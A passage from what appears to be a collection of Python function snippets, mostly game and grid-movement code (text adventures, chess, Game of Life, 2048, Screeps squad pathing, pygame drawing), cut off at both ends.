lm\n objs[delta] = river_obj\n #5) add river cells to map and layer\n for i,cell in enumerate(actual_path):\n prepare_cell_for_river(lm, cell)\n dx,dy,corner = get_path_orientation(i, cell, actual_path)\n if rounded_river:\n c = objs.get((dx,dy,corner))\n else:\n c = objs.get((dx,dy,None))\n if not c:\n raise Exception(\"No river object for delta\", dx, dy, corner)\n assert cell.name != \"river\"\n c = c.add_copy_on_cell(cell)\n cell.name = \"river\"\n lm.static_objects.append(c)\n\n if actual_path:\n## print(\"RIVER BUILT:\", [cell.coord for cell in actual_path])\n if not(\"water\" in actual_path[-1].material.name.lower()):\n for neigh in actual_path[-1].get_neighbors_moore():\n if neigh and neigh.name != \"river\":\n prepare_cell_for_river(lm, neigh)\n river_obj = MapObject(me, imgs[(0,0,None)][0], \"river\", 1.)\n river_obj.is_ground = True\n river_obj.lm = lm\n river_obj = river_obj.add_copy_on_cell(neigh)\n neigh.name = \"river\"\n lm.static_objects.append(river_obj)\n return objs", "def update(self):\n # Move left/right=====\n self.rect.x += self.change_x\n self.rect.y += self.change_y\n visited[int(self.rect.x/32)][int(self.rect.y/32)].append(self.id)\n\n self.path.append((int(self.rect.x/32), int(self.rect.y/32)))\n\n # if(self.rect.x == goal_x) & (self.rect.y == goal_y):\n # pygame.quit()\n # sys.exit(0)\n\n self.change_x = 0\n self.change_y = 0", "def move(argument, player):\n current_tile = world.tile_exists(player.location_x, player.location_y)\n if argument == \"north\":\n if world.tile_exists(player.location_x, player.location_y-1):\n new_tile = world.tile_exists(player.location_x, player.location_y-1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y-1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"south\":\n if world.tile_exists(player.location_x, player.location_y+1):\n new_tile = world.tile_exists(player.location_x, player.location_y+1)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x, player.location_y+1)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"east\":\n if world.tile_exists(player.location_x+1, player.location_y):\n new_tile = world.tile_exists(player.location_x + 1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x+1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n elif argument == \"west\":\n if world.tile_exists(player.location_x-1, player.location_y):\n new_tile = world.tile_exists(player.location_x-1, player.location_y)\n if new_tile.__class__.__name__ in current_tile.connected: # Making sure prospective tile is connected\n if new_tile.can_enter: # Making sure prospective tile is enter-able\n player.move(player.location_x-1, player.location_y)\n else:\n print(new_tile.name + \" is locked.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"You can't do that.\")\n else:\n print(\"Movement not recognized. Specify a cardinal direction.\")\n return", "def draw_room(screen, grid, start_location):\n wall_image = pygame.image.load(\"images/pillar.png\")\n wall_image_transparent = pygame.image.load(\"images/pillar_80.png\")\n floor_image = pygame.image.load(\"images/floor.png\")\n computer_image = pygame.image.load(\"images/desk_computer.png\")\n\n # map_to_image = [floor_image, # 0\n # wall_image, # 1\n # wall_image_transparent, # 2\n # computer_image] # 3\n map_to_image = {\n \"0\": floor_image,\n \"1\": wall_image,\n \"2\": wall_image_transparent,\n \"3\": computer_image,\n \"10\": wall_image # Secret passage\n }\n # better tile management for multiple environments / create multiple environments.\n # 0 = floor, 1 = wall (pillar)\n # First draw floor everywhere\n max_dimensions = grid.shape\n for r in range(max_dimensions[0]):\n for c in range(max_dimensions[1]):\n screen.blit(floor_image, (c * 30 + start_location[0],\n r * 30 + start_location[1]))\n\n for tile_type in [1, 2, 3, 10]:\n the_rows, the_cols = np.where(grid == tile_type)\n for i in range(len(the_cols)):\n screen.blit(map_to_image[str(tile_type)], (the_cols[i] * 30 + start_location[0],\n the_rows[i] * 30 + start_location[1]))", "def theRoof(pos, blockTypeMain = wool , mainColor=wPurple, replaceGlass = wGlass):\n \n # try again the same trick to add the roof\n # Middle part\n for i in range(0,12,1):\n iy = i\n if i >= 6:\n iy=11-i\n #print i, iy\n mc.setBlocks(pos.x-4+i, pos.y+10+iy, pos.z+4,\n pos.x-4+i, pos.y+10+iy, pos.z+29, blockTypeMain, mainColor)\n\n # RIGHT SIDE of the house\n for ii in range(0,3,1):\n mc.setBlocks(pos.x-5+ii, pos.y+9+ii, pos.z+5+ii,\n pos.x-13+ii, pos.y+9+ii, pos.z+29-ii, blockTypeMain, mainColor)\n #Remove the blocks\n\n material = air\n if ii >=2 :\n material = replaceGlass\n mc.setBlocks(pos.x-5+ii, pos.y+9+ii, pos.z+8,\n pos.x-11+ii, pos.y+9+ii, pos.z+26-ii, material)\n \n # and LEFT side of the house\n xAdjust = 21\n for ii in range(0,3,1):\n mc.setBlocks(pos.x-5-ii+xAdjust, pos.y+9+ii, pos.z+5+ii,\n pos.x-13-ii+xAdjust, pos.y+9+ii, pos.z+29-ii, blockTypeMain, mainColor)\n #Remove the blocks\n\n material = air\n if ii >=2 :\n material = replaceGlass\n mc.setBlocks(pos.x-7-ii+xAdjust, pos.y+9+ii, pos.z+8,\n pos.x-13-ii+xAdjust, pos.y+9+ii, pos.z+26-ii, material)", "def create_room(room):\n global map\n for x in range(room.x1+1, room.x2):\n for y in range(room.y1+1, room.y2):\n map[x][y].blocked = False\n map[x][y].block_sight = False", "def make_move(self, move, check_valid=True):\r\n self.board[move.sr][move.sc] = \"--\"\r\n self.board[move.er][move.ec] = move.pieceMoved\r\n self.moveLog.append(move)\r\n self.turn_white = not self.turn_white\r\n if move.pieceMoved == 'wk':\r\n self.wKingPos = (move.er, move.ec)\r\n elif move.pieceMoved == 'bk':\r\n self.bKingPos = (move.er, move.ec)\r\n\r\n if move.isEnpassantMove:\r\n self.board[move.sr][move.ec] = \"--\"\r\n\r\n if move.pieceMoved[1] == 'p' and abs(move.sr - move.er) == 2:\r\n self.enpas_pos = ((move.er + move.sr) // 2, move.ec)\r\n else:\r\n self.enpas_pos = ()\r\n\r\n if move.isPawnPromotion and not check_valid:\r\n promoted_piece = \"a\"\r\n while promoted_piece not in ('q', 'r', 'b', 'n'):\r\n promoted_piece = input(\"Promote to q, r, b, or n: \")\r\n self.board[move.er][move.ec] = move.pieceMoved[0] + promoted_piece\r\n\r\n # castle\r\n if move.castle:\r\n if move.ec - move.sc == 2:\r\n self.board[move.er][move.ec - 1] = self.board[move.er][move.ec + 1]\r\n self.board[move.er][move.ec + 1] = '--'\r\n else:\r\n self.board[move.er][move.ec + 1] = self.board[move.er][move.ec - 2]\r\n self.board[move.er][move.ec - 2] = '--'\r\n\r\n # castle rights on rook, king move\r\n self.update_castle_rights(move)\r\n self.castleRightsLog.append(CastleRights(self.cr_castle_r.wks, self.cr_castle_r.bks,\r\n self.cr_castle_r.wqs, self.cr_castle_r.bqs))", "def update(self):\n if self.x<0:\n self.x = 0\n\n if self.y <0:\n self.y = 0\n\n if bool(randint(0, 1))==True:\n if self.walker == True:\n self.x += randint(-2, 2)\n self.y += randint(-2, 2)", "def move(self, board, move_dir):\n if move_dir == \"right\":\n # failsafe: do not move through other cars on board\n if board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] == 'r':\n print(\"No movement!\")\n return board\n \n # give board correct new positions (characters)\n else:\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 1)] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\"\n\n # change car objects positions\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) + 1)\n return board\n elif move_dir == \"left\": \n if board.positions[self.get_rows()[0]][self.get_cols()[0] - 1].isupper() or board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] == 'r':\n print(\"No movement!\")\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0] - 1] = self.name[0]\n board.positions[self.get_rows()[0]][self.get_cols()[1] + (self.size - 2)] = \"x\"\n\n for i, col in enumerate(self.position):\n self.position[i] = str(self.get_rows()[0]) + \".\" + str(int(col[2]) - 1)\n return board\n elif move_dir == \"up\":\n #print(board.positions[self.get_rows()[0] - 1][self.get_cols()[0]])\n if board.positions[self.get_rows()[0] - 1][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n else:\n board.positions[self.get_rows()[0] - 1][self.get_cols()[0]] = self.name[0]\n board.positions[self.get_rows()[1] + (self.size - 2)][self.get_cols()[0]] = \"x\"\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) - 1) + \".\" + str(self.get_cols()[0])\n\n #print(board)\n return board\n elif move_dir == \"down\": \n try: \n if board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]].isupper() or board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] == 'r':\n print(\"No movement!\")\n return board\n except IndexError:\n return board\n else: \n board.positions[self.get_rows()[0]][self.get_cols()[0]] = \"x\" \n board.positions[self.get_rows()[1] + (self.size - 1)][self.get_cols()[0]] = self.name[0]\n\n for i, row in enumerate(self.position):\n self.position[i] = str(int(row[0]) + 1) + \".\" + str(self.get_cols()[0]) \n \n #print(self.position)\n #print(board)\n \n return board\n else:\n #print(\"NO MOVEMENT!\")\n return board", "def hallway(self):\n move_rooms = False\n option = None\n valid_move = False\n\n # Code to describe the hallway to the player.\n print(\"You are in the upstairs hallway.\")\n time.sleep(1)\n print(\"There is a painting on the wall.\")\n time.sleep(1)\n print(\"There are doors leading to the bedroom, bathroom and attic.\")\n time.sleep(1)\n print(\"There are also stairs leading down to the living room.\")\n time.sleep(1)\n\n # While loop allows player to interact with objects as many times \n # as they want.\n while move_rooms == False:\n print(\"What would you like to do?\")\n time.sleep(1)\n print(\"Look at the painting or move rooms?\")\n option = input(\"(Painting/Move) \\n\")\n # This block allows the player to interact with the painting.\n if option == \"Painting\" or option == \"painting\":\n self.objects.painting()\n # Allows player to move rooms.\n elif option == \"Move\" or option == \"move\":\n move_rooms = True\n # Prompts player to put valid input.\n else:\n print(\"Not a valid input, try again.\")\n \n # Loops over if room is not valid.\n while valid_move == False:\n print(\"Which room would you like to move to?\")\n time.sleep(1)\n print(\"The bedroom, bathroom, attic or living room?\")\n print(\"(Bedroom/Bathroom/Attic/Living)\")\n self.room_name = input()\n # If statement checks if the name is valid to escape while loop.\n if self.room_name == \"Bedroom\" or self.room_name == \"bedroom\" or self.room_name == \"Bathroom\" or self.room_name == \"bathroom\" or self.room_name == \"Attic\" or self.room_name == \"attic\" or self.room_name == \"Living\" or self.room_name == \"living\":\n valid_move = True\n else:\n print(\"Not a valid room, try again.\")", "def make_board(self):\n generate = lambda: random.randint(1, 100) in range(1, self.p_pit+1)\n some_number = self.some_number\n agent = Agent(some_number)\n agent.program = Oozeplorer_Percept(agent)\n self.add_agent(agent)\n gold = Gold()\n self.add_thing(gold, None)\n for row in range(1, some_number + 1):\n for col in range(1, some_number + 1):\n valid_spot = (row, col) != gold.location and (row, col) != (1, 1)\n if valid_spot and generate():\n t_pt = Pit()\n t_pt.location = (row, col)\n self.things.append(t_pt)", "def place_pillar_i(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_i = x, y\r\n if self.pillar_i_room() == self.pillar_a_room() or \\\r\n self.pillar_i_room() == self.pillar_e_room() or \\\r\n self.pillar_i_room() == self.pillar_p_room() or \\\r\n self.pillar_i_room() == self.entrance_room() or \\\r\n self.pillar_i_room() == self.exit_room():\r\n return self.place_pillar_i()\r\n self.__maze[x][y].set_pillar_i(True)", "def move(self, direction):\n\n # Check if there are empty tiles available\n for row in self._grid:\n if row.count(0) != 0:\n self._game_over = False\n break\n else:\n self._game_over = True\n\n # If empty tiles are not available, game over\n if self._game_over == True:\n print \"Sorry Game Over, Board Full\"\n print self.__str__()\n return None\n\n # New tiles won't be needed for illegal moves\n new_tiles_needed = False\n\n for tile in self._initial_tiles[direction]:\n old_tiles = self.traverse_grid(tile, OFFSETS[direction], self._steps[direction])\n tiles = merge(old_tiles)\n if old_tiles != tiles:\n # The old row and the new row are different after the merge\n # New tile will be needed\n new_tiles_needed = True\n self.set_grid(tile, OFFSETS[direction], tiles)\n\n if new_tiles_needed == True:\n self.new_tile()", "def lander_crashed(self):\n self.lander_lives -= 1\n self.reset_lander(\"Lander crashed!\")", "def __init__(self, x_size, y_size, grid_data, player_x=None, player_y=None, player_heading=None, flag_x=None, flag_y=None):\n self.x_size = x_size\n self.y_size = y_size\n self.grid_data = grid_data\n\n for i in range(y_size):\n row = self.grid_data[i]\n for j in range(x_size):\n if row[j] == self.FLAG_SYMBOL:\n self.flag_x = j\n self.flag_y = i\n break\n\n # extract player position and heading if none given\n if player_x is None and player_y is None and player_heading is None:\n found = False\n for i in range(y_size):\n row = self.grid_data[i]\n for j in range(x_size):\n if row[j] == self.PLAYER_UP_SYMBOL or row[j] == self.PLAYER_DOWN_SYMBOL or \\\n row[j] == self.PLAYER_LEFT_SYMBOL or row[j] == self.PLAYER_RIGHT_SYMBOL:\n found = True\n self.player_x = j\n self.player_y = i\n self.player_heading = {self.PLAYER_UP_SYMBOL: self.UP,\n self.PLAYER_DOWN_SYMBOL: self.DOWN,\n self.PLAYER_LEFT_SYMBOL: self.LEFT,\n self.PLAYER_RIGHT_SYMBOL: self.RIGHT}[row[j]]\n # replace the player symbol with land tile\n row[j] = self.LAND_SYMBOL\n break\n if found:\n break\n if not found:\n raise Exception(\"LaserTank Map Error: Grid data does not contain player symbol\")\n elif player_x is None or player_y is None or player_heading is None:\n raise Exception(\"LaserTank Map Error: Incomplete player coordinates given\")\n else:\n self.player_x = player_x\n self.player_y = player_y\n self.player_heading = player_heading", "def make_move(grid, n_columns, n_rows):\r\n # Generate the game grid to be manipulated\r\n new_grid = [[0] * (n_columns + 1) for i in range(n_rows + 1)]\r\n\r\n\r\n for i in range(n_rows):\r\n for j in range(n_columns):\r\n upper_left = grid[i-1][j-1] # neighbor to upper left of cell of interest\r\n upper = grid[i-1][j] # neighbor above cell of interest\r\n upper_right = grid[i-1][j+1] # neighbor to upper right of cell of interest\r\n left = grid[i][j-1] # neighbor to left of cell of interest\r\n right = grid[i][j+1] # neighbor to right of cell of interest\r\n bot_left = grid[i+1][j-1] # neighbor to bottom left cell of interest\r\n bot = grid[i+1][j] # neighbor below cell of interest\r\n bot_right = grid[i+1][j+1] # neighbor to bottom right of cell of interest\r\n\r\n # sum of the state of all neighbors\r\n on_neighbors = upper_left + upper + upper_right + left + right + bot_left + bot + bot_right\r\n\r\n # Any ON cell with fewer than two ON neighbors turns OFF\r\n if grid[i][j] == 1 and on_neighbors < 2:\r\n new_grid[i][j] = 0\r\n\r\n # Any ON cell with two or three ON neighbours stays ON\r\n elif grid[i][j] == 1 and (on_neighbors == 2 or on_neighbors == 3):\r\n new_grid[i][j] = 1\r\n\r\n # Any ON cell with more than three ON neighbors turns OFF\r\n elif grid[i][j] == 1 and on_neighbors > 3:\r\n new_grid[i][j] = 0\r\n\r\n # Any OFF cell with three ON neighbors turns ON\r\n elif grid[i][j] == 0 and on_neighbors == 3:\r\n new_grid[i][j] = 1\r\n\r\n return new_grid #manipulated game grid\r", "def fill_single_street():\n if facing_north():\n if not on_beeper():\n if not front_is_clear():\n turn_right()\n move()\n if not on_beeper():\n turn_around()\n # back to the initial position\n move()\n turn_around()\n fill_one_line()", "def move_random(self, board: Board) -> None:\n rnd_move_idx = randint(0,4)\n # moves: stay, up, left, right, down\n moves = [[0,0], [0,-1], [-1,0], [1,0], [0,1]]\n\n if board.can_position_at(self.x + moves[rnd_move_idx][0], self.y + moves[rnd_move_idx][1]):\n board.set_element_at_position(0, self.x, self.y)\n self.x += moves[rnd_move_idx][0]\n self.y += moves[rnd_move_idx][1]\n board.set_element_at_position(3, self.x, self.y)\n print(\"Bomberman moved to [\", self.x, \",\", self.y, \"]\")", "def place_pillar_p(self):\r\n x = random.randint(0, (self.__nx - 1))\r\n y = random.randint(0, (self.__ny - 1))\r\n self.__pillar_p = x, y\r\n if self.pillar_p_room() == self.pillar_a_room() or \\\r\n self.pillar_p_room() == self.pillar_e_room() or \\\r\n self.pillar_p_room() == self.pillar_i_room() or \\\r\n self.pillar_p_room() == self.entrance_room() or \\\r\n self.pillar_p_room() == self.exit_room():\r\n return self.place_pillar_p()\r\n self.__maze[x][y].set_pillar_p(True)", "async def update(self, robot):\r\n if self.first:\r\n robot.was_turning = False\r\n robot.was_driving = False\r\n\r\n rotation_rad = math.radians(robot.rotation)\r\n rotation_cos = math.cos(rotation_rad)\r\n rotation_sin = math.sin(rotation_rad)\r\n if robot.was_driving:\r\n speed_delta = robot.delta_time * robot.ROBOT_SPEED\r\n\r\n robot.add_odom_position(robot, (rotation_cos * speed_delta, rotation_sin * speed_delta))\r\n robot.grid.setStart(robot.grid_position)\r\n else:\r\n robot.drive_timer = robot.DRIVE_COOLDOWN\r\n if robot.was_turning:\r\n robot.add_odom_rotation(robot, robot.TURN_YAW * robot.delta_time)\r\n\r\n changed = False\r\n if robot.ball is not None:\r\n if robot.prev_ball is not None:\r\n robot.ball_grid = robot.grid.worldToGridCoords(robot.ball)\r\n robot.ball_prev_grid = robot.grid.worldToGridCoords(robot.prev_ball)\r\n changed = robot.ball_grid != robot.ball_prev_grid\r\n else:\r\n changed = True\r\n \r\n if not changed and robot.prev_grid_position != robot.grid_position:\r\n changed = True\r\n\r\n if self.first:\r\n changed = True\r\n self.first = False\r\n\r\n rounded_grid = (round(robot.grid_position[0]), round(robot.grid_position[1]))\r\n if changed:\r\n robot.grid.clearObstacles()\r\n if robot.ball is not None:\r\n grid_points = getGridPoints(robot.ball_grid[0], robot.ball_grid[1], robot)\r\n for point in grid_points:\r\n if robot.grid.coordInBounds(point):\r\n robot.grid.addObstacle(point)\r\n\r\n # Wall obstacles.\r\n for i in range(0, robot.grid.width):\r\n robot.grid.addObstacle((i, 0))\r\n robot.grid.addObstacle((i, robot.grid.height - 1))\r\n for i in range(1, robot.grid.height - 1):\r\n robot.grid.addObstacle((0, i))\r\n robot.grid.addObstacle((robot.grid.width - 1, i))\r\n\r\n goal_to_ball = np.subtract(robot.ball, robot.goal_position)\r\n goal_distance = np.linalg.norm(goal_to_ball)\r\n if goal_distance == 0:\r\n return\r\n goal_direction = np.divide(goal_to_ball, goal_distance)\r\n goal_direction = np.multiply(goal_direction, (robot.RADIUS + robot.BALL_RADIUS) * 1.2)\r\n robot.target_position = np.add(robot.ball, goal_direction)\r\n robot.target_position = robot.grid.worldToGridCoords(robot.target_position)\r\n\r\n if robot.target_position is not None:\r\n robot.grid.clearGoals()\r\n robot.grid.setStart(rounded_grid)\r\n rounded_target = (round(robot.target_position[0]), round(robot.target_position[1]))\r\n robot.grid.addGoal(rounded_target)\r\n astar(robot.grid, heuristic)\r\n\r\n path = robot.grid.getPath()\r\n robot.was_turning = False\r\n if path is not None and len(path) > 1:\r\n robot.next_cell = path[0]\r\n if path[0] == rounded_grid:\r\n robot.next_cell = path[1]\r\n\r\n turn = getTurnDirection(rotation_cos, rotation_sin, rounded_grid, robot.next_cell)\r\n if abs(turn) > robot.TURN_THRESHOLD and abs(2 * math.pi - abs(turn)) > robot.TURN_THRESHOLD:\r\n robot.stop_all_motors()\r\n await robot.turn_in_place(radians(turn), num_retries=3).wait_for_completed()\r\n robot.add_odom_rotation(robot, math.degrees(turn))\r\n robot.was_driving = False\r\n else:\r\n await robot.drive_wheels(robot.ROBOT_SPEED, robot.ROBOT_SPEED, robot.ROBOT_ACCELERATION, robot.ROBOT_ACCELERATION)\r\n robot.was_driving = True\r\n else:\r\n robot.was_driving = False\r\n\r\n turn = getTurnDirection(rotation_cos, rotation_sin, robot.grid_position, robot.target_position)\r\n robot.stop_all_motors()\r\n if abs(turn) > robot.TURN_THRESHOLD and abs(2 * math.pi - abs(turn)) > robot.TURN_THRESHOLD:\r\n await robot.turn_in_place(radians(turn), num_retries=3).wait_for_completed()\r\n robot.add_odom_rotation(robot, math.degrees(turn))\r\n\r\n robot.stop_all_motors()\r\n distance = grid_distance(robot.grid_position[0], robot.grid_position[1], robot.target_position[0], robot.target_position[1]) * robot.grid.scale\r\n await robot.drive_straight(distance_mm(distance), speed_mmps(robot.HIT_SPEED), should_play_anim = False).wait_for_completed()\r\n robot.add_odom_forward(robot, distance)\r\n\r\n turn = getTurnDirection(rotation_cos, rotation_sin, robot.grid_position, robot.ball_grid)\r\n robot.stop_all_motors()\r\n if abs(turn) > robot.TURN_THRESHOLD and abs(2 * math.pi - abs(turn)) > robot.TURN_THRESHOLD:\r\n await robot.turn_in_place(radians(turn), num_retries=3).wait_for_completed()\r\n robot.add_odom_rotation(robot, math.degrees(turn))\r\n return goto_ball.HitBall()", "def move_to_stage_1(self, target, any_hostiles):\n # type: (RoomPosition, bool) -> None\n ordered_members = self.members_movement_order()\n\n self.log(\"Members {} moving - stage 1.\", _.pluck(ordered_members, 'name'))\n\n options = self.new_movement_opts()\n\n home = ordered_members[0].home\n origin = self.find_origin()\n\n serialized_obj = home.hive.honey.get_serialized_path_obj(origin, target, options)\n ordered_rooms_in_path = honey.get_room_list_from_serialized_obj(serialized_obj)\n\n room_path_lengths = []\n for room_name in ordered_rooms_in_path:\n room_path_lengths.push(len(serialized_obj[room_name]) - 1)\n\n members_path_positions = []\n any_member_off_path = False\n\n furthest_back_hurt_index = None\n\n for index in range(0, len(ordered_members)):\n drone = ordered_members[index]\n\n if drone.creep.hits < drone.creep.hitsMax:\n furthest_back_hurt_index = index\n\n room_index = ordered_rooms_in_path.indexOf(drone.pos.roomName)\n if not room_index:\n # if drone != ordered_members[0]:\n any_member_off_path = True\n members_path_positions.push(None)\n continue\n room_path = serialized_obj[drone.pos.roomName]\n\n path_index, moving_direction, reverse_dir = drone.creep.findIndexAndDirectionInPath(room_path)\n\n if path_index < 0:\n self.log(\"..: position ({},{}) is not within {} ({}, {}, {})\",\n drone.pos.x, drone.pos.y, room_path, path_index, moving_direction, reverse_dir)\n any_member_off_path = True\n members_path_positions.push(None)\n continue\n\n members_path_positions.push({\n 'room': room_index,\n 'path': path_index,\n 'dir': moving_direction,\n 'rev': reverse_dir,\n })\n\n if any_member_off_path:\n for i in range(len(ordered_members) - 1, -1, -1):\n member = ordered_members[i]\n\n moving_now = False\n if members_path_positions[i] is None:\n # Since the member is definitely off the path\n self.log(\"Member {} ({}) off path - individually following military path ({} -> {})..\",\n member.name, member.pos, origin, target)\n\n else:\n if member.pos.x <= 2 or member.pos.x >= 48 or member.pos.y <= 2 or member.pos.y >= 48 \\\n or _.some(member.room.look_for_in_area_around(LOOK_STRUCTURES, member.pos, 1),\n lambda s: s.destination):\n moving_now = True\n else:\n # members near members that are off path should also move, to make room available.\n for i2 in range(0, len(ordered_members)):\n other_member = ordered_members[i2]\n if members_path_positions[i2] is None \\\n and movement.chebyshev_distance_room_pos(other_member.pos, member.pos) \\\n <= len(ordered_members) + 1:\n moving_now = True\n break\n\n if moving_now:\n direction = members_path_positions[i].dir\n # key code turned from findIndexAndDirectionInPath when we're at an exit and we should\n # just say put.\n if direction != -30:\n result = member.creep.move(direction)\n member.creep.__direction_moved = direction\n if result != OK and result != ERR_TIRED:\n member.log(\"Error moving by squad path ({}.move({})): {}\",\n member.creep, direction, result)\n member.follow_military_path(origin, target, options)\n else:\n more_to_move_without_near_edge = Infinity\n # iterate backwards over every member so we can break the loop easily if any further back members are\n # too far behind.\n # ordered_members[0] is the head of the group\n any_fatigued = False\n for i in range(len(ordered_members) - 1, -1, -1):\n drone = ordered_members[i]\n\n if drone.creep.fatigue:\n any_fatigued = True\n\n # will sometimes be undefined, but that's ok since it's only used if furthest_back_hurt_index > 1\n prev_drone = ordered_members[i + 1]\n move_obj = members_path_positions[i]\n\n if drone.memory.off_path_for:\n del drone.memory.next_ppos\n del drone.memory.off_path_for\n del drone.memory.lost_path_at\n\n if more_to_move_without_near_edge <= 0 and not movement.is_edge_position(drone.pos):\n continue\n else:\n more_to_move_without_near_edge -= 1\n\n # self.log(\"[{}] regular stage1 movement in dir {}\", drone.name, move_obj.dir)\n\n # key code turned from findIndexAndDirectionInPath when we're at an exit and we should\n # just say put.\n if not move_obj and i == 0:\n drone.follow_military_path(origin, target, options)\n else:\n if furthest_back_hurt_index > i:\n drone.log(\"moving backwards to help out.\")\n if not drone.pos.isNearTo(prev_drone.pos) and any_fatigued:\n if move_obj.rev != -30:\n result = drone.creep.move(move_obj.rev)\n drone.creep.__direction_moved = move_obj.rev\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\",\n drone.creep, move_obj.rev, result)\n continue\n\n if move_obj.dir != -30:\n result = drone.creep.move(move_obj.dir)\n drone.creep.__direction_moved = move_obj.dir\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\", drone.creep, move_obj.dir, result)\n\n if i != 0:\n next_member_obj = members_path_positions[i - 1]\n\n room_diff = next_member_obj['room'] - move_obj['room']\n if room_diff < 0:\n self.log(\"[{}] we're ahead - moving backwards ({})\", drone.name, move_obj.rev)\n if move_obj.rev != -30:\n result = drone.creep.move(move_obj.rev)\n drone.creep.__direction_moved = move_obj.rev\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\",\n drone.creep, move_obj.rev, result)\n continue\n elif room_diff == 0:\n abs_path_diff = next_member_obj['path'] - move_obj['path']\n\n if abs_path_diff < 0:\n self.log(\"[{}] we're ahead - moving backwards ({}).\", drone.name, move_obj.rev)\n if move_obj.rev != -30:\n result = drone.creep.move(move_obj.rev)\n drone.creep.__direction_moved = move_obj.rev\n if result != OK and result != ERR_TIRED:\n drone.log(\"Error moving by squad path ({}.move({})): {}\",\n drone.creep, move_obj.rev, result)\n continue\n elif room_diff == 1:\n # use the room path length to see how far we are to the edge of the room, to get an accurate\n # diff\n abs_path_diff = (next_member_obj['path'] - 4) \\\n + (room_path_lengths[move_obj['room']] - move_obj['path'])\n\n if abs_path_diff < 0:\n # room_path_lengths is an estimation, and may be off.\n abs_path_diff = next_member_obj['path']\n else:\n # just a message that we're quite far behind.\n abs_path_diff = 100\n\n self.log(\"[{}] room diff: {}, path diff: {}, pos: {}\",\n drone.name, room_diff, abs_path_diff, drone.pos)\n if abs_path_diff > 10 or (any_hostiles and abs_path_diff > 1):\n more_to_move_without_near_edge = 0\n continue\n elif abs_path_diff <= 1:\n more_to_move_without_near_edge += 1\n # TODO: move backwards to re-unite when there are hostiles.", "def sling_action():\n global mouse_distance\n global rope_length\n global angle\n global mouse_x_pos\n global mouse_y_pos\n\n #add code inside sling function\n # Fixing bird to the sling rope\n vec = vector((initial_x_sling, initial_y_sling), (mouse_x_pos, mouse_y_pos))\n unit_vec = unit_vector(vec)\n uv_1 = unit_vec[0]\n uv_2 = unit_vec[1]\n mouse_distance = distance(initial_x_sling, initial_y_sling, mouse_x_pos, mouse_y_pos) #point at which currrent bird id\n fix_pos = (uv_1*rope_length+initial_x_sling, uv_2*rope_length+initial_y_sling)\n highest_length = 102 #when stretched\n\n #to make bird stay within rope\n x_redbird = mouse_x_pos - 20\n y_redbird = mouse_y_pos - 20\n if mouse_distance > rope_length:\n pux, puy = fix_pos\n pux -= 20\n puy -= 20\n first_pos = pux, puy\n screen.blit(redbird, first_pos)\n second_pos = (uv_1*highest_length+initial_x_sling, uv_2*highest_length+initial_y_sling) #current position\n pygame.draw.line(screen, (255, 0, 0), (next_x_sling, next_y_sling), second_pos, 5) #catapult rope\n screen.blit(redbird, first_pos)\n pygame.draw.line(screen, (255, 0, 0), (initial_x_sling, initial_y_sling), second_pos, 5) #ANOTHER SIDE of catapult\n else:\n #when not fully stretched\n mouse_distance += 10\n third_pos = (uv_1*mouse_distance+initial_x_sling, uv_2*mouse_distance+initial_y_sling)\n pygame.draw.line(screen, (0, 0, 0), (next_x_sling, next_y_sling), third_pos, 5)\n screen.blit(redbird, (x_redbird, y_redbird))\n pygame.draw.line(screen, (0, 0, 0), (initial_x_sling, initial_y_sling), third_pos, 5)\n # Angle of impulse\n\n change_in_y = mouse_y_pos - initial_y_sling\n change_in_x = mouse_x_pos - initial_x_sling\n if change_in_x == 0:\n dx = 0.00000000000001\n angle = math.atan((float(change_in_y))/change_in_x)", "def move_girl(girl):\n global trainer_speed, girlcount, girl_left\n if girl_left:\n for i in girl:\n i.x -= trainer_speed\n i.move_speed()\n girlcount += 0.5\n girl_frame = int(girlcount) % 3\n camera.draw(girl[girl_frame])\n else:\n for i in girl:\n i.x += trainer_speed\n i.move_speed()\n girlcount += 0.5\n girl_frame = int(girlcount) % 3\n camera.draw(girl[girl_frame + 3])\n for each in girl:\n if each.x < 20:\n girl_left = False\n if each.x > 780:\n girl_left = True", "def make_move(self, move: Any) -> \"StonehengeState\":\n new_board = deepcopy(self.current_board)\n for index in range(len(self.current_board)):\n if self.current_board[index] == move:\n if self.p1_turn:\n new_board = new_board.replace(\n self.current_board[index], '1')\n else:\n new_board = new_board.replace(\n self.current_board[index], '2')\n new_ley_lines = deepcopy(self.current_ley_lines)\n for item in new_ley_lines:\n for key in item:\n for index in range(len(key[1])):\n if key[1][index] == move:\n if self.p1_turn:\n key[1][index] = '1'\n else:\n 